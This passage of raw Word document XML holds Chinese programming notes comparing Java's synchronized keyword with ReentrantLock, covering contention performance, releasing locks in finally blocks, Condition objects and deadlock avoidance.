          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能要优于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReetrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是在资源竞争很激烈的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能会下降几十倍，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReetrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能能维持常态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002101B8" w:rsidRPr="004F2633" w:rsidRDefault="002101B8" w:rsidP="004F2633">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002101B8" w:rsidRDefault="002101B8" w:rsidP="002942F3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002942F3" w:rsidRDefault="002942F3" w:rsidP="002942F3">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:firstLineChars="250" w:firstLine="450"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>能完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>所实现的所有功能</w:t>
      </w:r>
      <w:r w:rsidR="00E541CA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00E541CA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t xml:space="preserve">ReentrantLock </w:t>
      </w:r>
      <w:r w:rsidR="00E541CA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>拥有</w:t>
      </w:r>
      <w:r w:rsidR="00E541CA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidR="00E541CA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="333333"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        </w:rPr>
        <w:t>相同的并发性和内存语义</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AD2A34" w:rsidRDefault="00F957AB" w:rsidP="00CF2A27">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会自动释放锁，但是</w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Lock</w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>一定要求程序员手工释放，并且必须在</w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r w:rsidR="00A22876">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>从句中释放</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00853DD9" w:rsidRDefault="00853DD9" w:rsidP="00F957AB">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8306"/>
        </w:tabs>
        <w:ind w:left="360" w:firstLineChars="50" w:firstLine="105"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00853DD9">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在资源竞争不是很激烈的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能要优于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReetrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，但是在资源竞争很激烈的情况下，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能会下降几十倍，但是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ReetrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的性能能维持常态</w:t>
      </w:r>
      <w:r w:rsidR="00C226FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C226FA" w:rsidRDefault="00C226FA" w:rsidP="00C226FA">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="125" w:line="301" w:lineRule="atLeast"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1.ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>功能性方面更全面，比如时间锁等候，可中断锁等候，锁投票等，因此更有扩展性。在多个</w:t>
      </w:r>
      <w:hyperlink r:id="rId149" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>条件变量</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>和高度竞争锁的地方，用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>更合适，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>还提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，对</w:t>
      </w:r>
      <w:hyperlink r:id="rId150" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>线程</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的等待和唤醒等操作更加灵活，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>可以有多个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>实例，所以更有扩展性。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>2.ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>必须在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>finally</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>中释放锁，否则后果很严重，编码角度来说使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>更加简单，不容易遗漏或者出错。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">3.ReentrantLock </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的性能比</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>会好点。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>4.ReentrantLock</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>提供了可</w:t>
      </w:r>
      <w:hyperlink r:id="rId151" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>轮询</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>的锁请求，他可以尝试的去取得锁，如果取得成功则继续处理，取得不成功，可以等下次运行的时候处理，所以不容易产生</w:t>
      </w:r>
      <w:hyperlink r:id="rId152" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>死锁</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>synchronized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>则一旦进入锁请求要么成功，要么一直阻塞，所以更容易产生</w:t>
      </w:r>
      <w:hyperlink r:id="rId153" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="2D64B3"/>
            <w:sz w:val="18"/>
            <w:szCs w:val="18"/>
          </w:rPr>
          <w:t>死锁</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C12E3F" w:rsidRDefault="00C12E3F" w:rsidP="00C12E3F">
      <w:pPr>
        <w:pStyle w:val="HTML0"/>
        <w:shd w:val="clear" w:color="auto" w:fill="F3FFEC"/>
        <w:spacing w:after="150" w:line="360" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD7453">
        <w:rPr>
